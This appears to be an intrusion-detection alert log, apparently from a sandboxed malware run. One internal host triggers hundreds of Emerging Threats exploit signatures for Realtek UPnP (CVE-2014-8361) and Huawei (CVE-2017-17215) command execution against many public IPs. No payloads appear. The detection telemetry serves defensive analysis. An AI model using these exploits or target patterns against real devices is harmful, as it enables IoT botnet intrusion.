                                                07/20/24-23:06:25.711626TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4254652869192.168.2.1476.0.97.189
                                                07/20/24-23:05:45.429987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4112037215192.168.2.1473.221.93.26
                                                07/20/24-23:06:25.940016TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3523052869192.168.2.1460.28.102.104
                                                07/20/24-23:05:38.124441TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5500452869192.168.2.1497.71.44.240
                                                07/20/24-23:05:47.385927TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614888652869192.168.2.1469.202.5.98
                                                07/20/24-23:06:08.565771TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24099252869192.168.2.14122.247.158.220
                                                07/20/24-23:06:02.402123TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5257652869192.168.2.1447.131.236.250
                                                07/20/24-23:05:57.229188TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614204852869192.168.2.1419.228.35.122
                                                07/20/24-23:05:46.432345TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614940452869192.168.2.1461.16.44.183
                                                07/20/24-23:05:52.444445TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4233052869192.168.2.1494.30.138.165
                                                07/20/24-23:06:04.407220TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23306852869192.168.2.14130.191.45.135
                                                07/20/24-23:06:17.411596TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614195052869192.168.2.1454.94.45.4
                                                07/20/24-23:05:42.257476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4024037215192.168.2.14157.208.195.212
                                                07/20/24-23:05:48.230792TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5168452869192.168.2.14154.72.172.164
                                                07/20/24-23:05:48.795527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6089437215192.168.2.14157.215.90.17
                                                07/20/24-23:05:47.525551TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614370852869192.168.2.1445.228.151.222
                                                07/20/24-23:05:35.322897TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614907452869192.168.2.1489.113.83.91
                                                07/20/24-23:05:50.510455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4554837215192.168.2.1432.126.246.40
                                                07/20/24-23:05:58.995248TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5992052869192.168.2.1442.106.20.3
                                                07/20/24-23:05:58.087911TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23917252869192.168.2.14126.169.68.235
                                                07/20/24-23:05:57.811976TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4229652869192.168.2.14129.180.128.160
                                                07/20/24-23:05:58.627537TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5487052869192.168.2.1414.148.136.80
                                                07/20/24-23:06:27.200731TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24416852869192.168.2.14117.253.38.147
                                                07/20/24-23:05:40.457644TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4628452869192.168.2.14161.222.69.144
                                                07/20/24-23:05:52.478141TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3468052869192.168.2.1496.201.129.138
                                                07/20/24-23:05:33.861759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3955037215192.168.2.14157.83.28.229
                                                07/20/24-23:06:34.157855TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615426052869192.168.2.14103.13.164.163
                                                07/20/24-23:06:08.610993TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5005852869192.168.2.1440.174.255.112
                                                07/20/24-23:06:13.006675TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4929052869192.168.2.14130.198.32.116
                                                07/20/24-23:05:45.437584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665037215192.168.2.1441.26.105.233
                                                07/20/24-23:05:57.551205TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3538452869192.168.2.1485.8.43.114
                                                07/20/24-23:06:05.344940TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6022652869192.168.2.14190.26.67.211
                                                07/20/24-23:06:10.391415TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5554052869192.168.2.1477.178.250.45
                                                07/20/24-23:07:12.667310TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5971852869192.168.2.1417.149.245.24
                                                07/20/24-23:05:57.004582TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4971252869192.168.2.1431.186.230.47
                                                07/20/24-23:05:39.117518TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613961052869192.168.2.1423.7.74.55
                                                07/20/24-23:05:57.111519TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3904652869192.168.2.14203.90.117.81
                                                07/20/24-23:06:56.877705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013637215192.168.2.14123.151.1.145
                                                07/20/24-23:06:10.056587TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4909652869192.168.2.142.16.233.94
                                                07/20/24-23:05:37.445004TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5621452869192.168.2.14138.71.112.70
                                                07/20/24-23:06:03.378832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5769037215192.168.2.1441.228.183.143
                                                07/20/24-23:05:35.896111TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615290852869192.168.2.1417.189.220.248
                                                07/20/24-23:05:36.252094TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4148652869192.168.2.14199.49.205.148
                                                07/20/24-23:05:40.413672TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5321052869192.168.2.1448.109.149.149
                                                07/20/24-23:05:57.062143TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23548052869192.168.2.14150.121.194.2
                                                07/20/24-23:07:04.461996TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3532852869192.168.2.1492.148.201.172
                                                07/20/24-23:05:37.452253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5403252869192.168.2.14179.192.77.243
                                                07/20/24-23:06:06.896657TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25350052869192.168.2.14117.185.208.242
                                                07/20/24-23:05:40.465472TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3623652869192.168.2.14200.28.88.206
                                                07/20/24-23:06:00.620653TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3659652869192.168.2.14130.148.196.29
                                                07/20/24-23:05:39.043746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442437215192.168.2.14197.137.136.164
                                                07/20/24-23:05:42.245589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3282037215192.168.2.14197.107.43.58
                                                07/20/24-23:05:35.574592TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615662652869192.168.2.14148.195.201.170
                                                07/20/24-23:05:42.131789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4200237215192.168.2.1441.233.102.86
                                                07/20/24-23:07:36.558559TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615054452869192.168.2.1418.214.245.19
                                                07/20/24-23:05:36.320247TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3601652869192.168.2.14185.59.206.117
                                                07/20/24-23:06:15.395080TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4807652869192.168.2.14133.227.108.255
                                                07/20/24-23:06:01.180750TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6065052869192.168.2.14168.167.96.130
                                                07/20/24-23:06:23.359635TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615116452869192.168.2.1471.235.37.66
                                                07/20/24-23:05:48.807124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4331037215192.168.2.14157.60.228.45
                                                07/20/24-23:06:18.564435TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615207852869192.168.2.1482.79.164.142
                                                07/20/24-23:05:46.246572TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4580252869192.168.2.14151.188.92.157
                                                07/20/24-23:05:45.376608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6027037215192.168.2.14181.34.190.61
                                                07/20/24-23:06:05.839926TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5696252869192.168.2.14162.255.243.82
                                                07/20/24-23:05:37.472706TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25510852869192.168.2.1417.184.234.0
                                                07/20/24-23:05:42.134564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313237215192.168.2.1441.50.207.1
                                                07/20/24-23:06:01.593708TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4218252869192.168.2.14138.242.28.121
                                                07/20/24-23:07:15.790678TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5536852869192.168.2.14128.39.139.203
                                                07/20/24-23:05:47.246625TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4027652869192.168.2.14210.22.195.78
                                                07/20/24-23:06:03.208973TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614819252869192.168.2.142.16.233.94
                                                07/20/24-23:06:01.105390TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4351452869192.168.2.14179.59.38.175
                                                07/20/24-23:05:46.292919TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5708252869192.168.2.14139.162.45.48
                                                07/20/24-23:05:57.943746TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4375652869192.168.2.1417.146.227.125
                                                07/20/24-23:05:37.446803TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3375452869192.168.2.14188.199.48.64
                                                07/20/24-23:05:37.444466TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4536052869192.168.2.1498.74.12.225
                                                07/20/24-23:05:56.972496TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614527252869192.168.2.1444.81.94.227
                                                07/20/24-23:05:57.136226TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24274852869192.168.2.1412.127.100.36
                                                07/20/24-23:06:01.986039TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26045852869192.168.2.1423.100.51.122
                                                07/20/24-23:05:56.038244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3822037215192.168.2.14157.200.193.204
                                                07/20/24-23:06:09.080473TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24077452869192.168.2.1461.85.255.31
                                                07/20/24-23:05:39.341019TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615695452869192.168.2.14143.71.98.5
                                                07/20/24-23:05:39.061893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358637215192.168.2.1441.165.207.46
                                                07/20/24-23:06:29.102034TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615997452869192.168.2.14121.110.33.111
                                                07/20/24-23:06:23.571514TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614907852869192.168.2.14178.36.192.91
                                                07/20/24-23:07:03.833995TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5763252869192.168.2.1477.148.122.8
                                                07/20/24-23:05:38.732645TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614913852869192.168.2.149.176.88.108
                                                07/20/24-23:06:35.379204TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25509052869192.168.2.1486.70.141.165
                                                07/20/24-23:05:35.843525TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5021252869192.168.2.14173.89.193.209
                                                07/20/24-23:05:59.404275TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25614852869192.168.2.14160.172.64.185
                                                07/20/24-23:05:35.540920TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3490652869192.168.2.1439.204.207.21
                                                07/20/24-23:05:38.534264TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3969652869192.168.2.14217.104.148.40
                                                07/20/24-23:05:40.455250TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25751452869192.168.2.14141.250.254.239
                                                07/20/24-23:05:46.543705TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614506652869192.168.2.14187.153.198.62
                                                07/20/24-23:06:11.251823TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615314652869192.168.2.14149.61.158.243
                                                07/20/24-23:05:38.953817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3280037215192.168.2.1441.66.114.65
                                                07/20/24-23:05:57.568828TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5339052869192.168.2.1495.50.102.157
                                                07/20/24-23:05:37.455022TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25435452869192.168.2.1417.189.220.248
                                                07/20/24-23:06:03.387430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5650437215192.168.2.14108.187.236.148
                                                07/20/24-23:07:34.791351TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614106252869192.168.2.1412.208.13.200
                                                07/20/24-23:05:58.884219TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24186452869192.168.2.1440.70.128.177
                                                07/20/24-23:06:02.251198TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3778652869192.168.2.1499.252.205.139
                                                07/20/24-23:05:58.254464TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25376252869192.168.2.14148.178.56.30
                                                07/20/24-23:05:36.324524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5618837215192.168.2.14197.248.32.116
                                                07/20/24-23:05:42.220682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3612237215192.168.2.1441.75.174.238
                                                07/20/24-23:05:37.493635TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4644252869192.168.2.14120.181.185.117
                                                07/20/24-23:05:57.210836TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4547652869192.168.2.14113.163.150.34
                                                07/20/24-23:05:48.780090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3982637215192.168.2.14135.231.61.219
                                                07/20/24-23:05:58.104584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4512252869192.168.2.1465.77.245.190
                                                07/20/24-23:07:01.613026TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5428252869192.168.2.1457.38.35.10
                                                07/20/24-23:05:36.067351TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4773652869192.168.2.1437.154.117.198
                                                07/20/24-23:05:35.536547TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615708052869192.168.2.1472.58.64.100
                                                07/20/24-23:05:40.334659TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5957852869192.168.2.14157.254.149.171
                                                07/20/24-23:05:59.408866TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614651052869192.168.2.14203.77.85.241
                                                07/20/24-23:06:07.044272TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4262052869192.168.2.14212.79.198.77
                                                07/20/24-23:05:42.256029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5314237215192.168.2.1493.47.151.173
                                                07/20/24-23:06:01.465127TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615850452869192.168.2.14150.6.47.69
                                                07/20/24-23:06:34.148721TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3869052869192.168.2.14125.239.95.227
                                                07/20/24-23:05:37.468656TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5256652869192.168.2.14149.79.37.237
                                                07/20/24-23:05:59.221858TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4229052869192.168.2.1486.230.221.175
                                                07/20/24-23:05:45.403074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4474437215192.168.2.1489.73.219.229
                                                07/20/24-23:06:06.466712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5383637215192.168.2.14155.221.60.182
                                                07/20/24-23:06:11.546878TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615554052869192.168.2.14114.44.226.32
                                                07/20/24-23:06:01.183172TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4140252869192.168.2.1466.55.188.148
                                                07/20/24-23:05:59.132842TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613640252869192.168.2.14209.32.8.160
                                                07/20/24-23:06:02.767606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5369652869192.168.2.1484.81.98.79
                                                07/20/24-23:06:53.435475TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24952652869192.168.2.14168.156.209.183
                                                07/20/24-23:05:38.545017TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4023052869192.168.2.1451.130.138.196
                                                07/20/24-23:06:49.853581TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4094052869192.168.2.1447.168.17.153
                                                07/20/24-23:05:59.208138TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5308252869192.168.2.1478.100.44.178
                                                07/20/24-23:06:29.762937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4099652869192.168.2.14180.190.149.207
                                                07/20/24-23:05:55.889998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5278637215192.168.2.1441.189.113.240
                                                07/20/24-23:05:40.326250TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24659252869192.168.2.1492.177.238.200
                                                07/20/24-23:05:59.692242TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615015852869192.168.2.14174.254.246.247
                                                07/20/24-23:05:42.145992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4963837215192.168.2.14197.142.224.212
                                                07/20/24-23:05:34.622534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3419437215192.168.2.1441.254.196.153
                                                07/20/24-23:05:39.680161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5232037215192.168.2.14197.33.215.191
                                                07/20/24-23:05:52.603344TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24700452869192.168.2.14223.10.185.52
                                                07/20/24-23:05:36.323670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5752637215192.168.2.14197.65.82.249
                                                07/20/24-23:06:01.181584TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24245852869192.168.2.14135.229.90.34
                                                07/20/24-23:06:00.265687TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614289852869192.168.2.14152.22.234.187
                                                07/20/24-23:06:08.496960TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24185052869192.168.2.1417.167.26.145
                                                07/20/24-23:06:24.605729TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616063052869192.168.2.14101.241.213.40
                                                07/20/24-23:05:38.622531TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5650452869192.168.2.145.238.81.248
                                                07/20/24-23:05:52.507639TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24180052869192.168.2.14175.10.5.126
                                                07/20/24-23:05:59.204161TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613734452869192.168.2.14160.105.28.66
                                                07/20/24-23:05:38.949221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3863037215192.168.2.14157.40.150.223
                                                07/20/24-23:05:52.539655TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24574052869192.168.2.14156.53.15.210
                                                07/20/24-23:06:18.671322TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5528052869192.168.2.14143.84.11.112
                                                07/20/24-23:05:35.202217TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614287452869192.168.2.14174.38.108.83
                                                07/20/24-23:05:59.930873TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24959652869192.168.2.14125.143.14.140
                                                07/20/24-23:05:36.342361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4801437215192.168.2.14157.173.110.253
                                                07/20/24-23:05:50.479091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3703637215192.168.2.1441.219.58.56
                                                07/20/24-23:05:35.507047TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615401052869192.168.2.1434.90.248.232
                                                07/20/24-23:06:17.564288TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3883852869192.168.2.1496.182.113.188
                                                07/20/24-23:06:03.378832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3997437215192.168.2.14106.255.94.31
                                                07/20/24-23:05:39.301436TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613673252869192.168.2.14108.93.153.171
                                                07/20/24-23:06:21.718589TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25861252869192.168.2.14149.227.126.225
                                                07/20/24-23:06:00.067283TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4053052869192.168.2.1462.176.218.93
                                                07/20/24-23:05:45.988990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5761037215192.168.2.14197.191.67.100
                                                07/20/24-23:06:12.350524TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5143252869192.168.2.1412.14.97.209
                                                07/20/24-23:06:14.511508TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23459452869192.168.2.14150.164.92.90
                                                07/20/24-23:06:00.022949TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4800252869192.168.2.14125.212.164.174
                                                07/20/24-23:05:57.027141TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4053252869192.168.2.14216.188.116.154
                                                07/20/24-23:05:33.859349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4267637215192.168.2.1441.156.206.214
                                                07/20/24-23:05:36.590112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3699837215192.168.2.14178.163.147.89
                                                07/20/24-23:05:56.334607TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5364252869192.168.2.1484.68.245.96
                                                07/20/24-23:05:39.054227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5203237215192.168.2.14132.98.103.26
                                                07/20/24-23:05:37.458829TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5840852869192.168.2.14102.124.228.209
                                                07/20/24-23:05:58.227664TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614330052869192.168.2.1464.167.73.71
                                                07/20/24-23:05:35.498293TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615130852869192.168.2.14119.83.111.97
                                                07/20/24-23:05:46.406047TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615607052869192.168.2.14113.82.161.254
                                                07/20/24-23:06:00.620754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5297637215192.168.2.14197.88.244.51
                                                07/20/24-23:06:26.588323TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5534052869192.168.2.14169.13.159.45
                                                07/20/24-23:06:12.617233TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4851252869192.168.2.1425.75.108.18
                                                07/20/24-23:05:48.035512TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4115852869192.168.2.14137.223.238.217
                                                07/20/24-23:06:00.971446TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3806052869192.168.2.14174.28.203.137
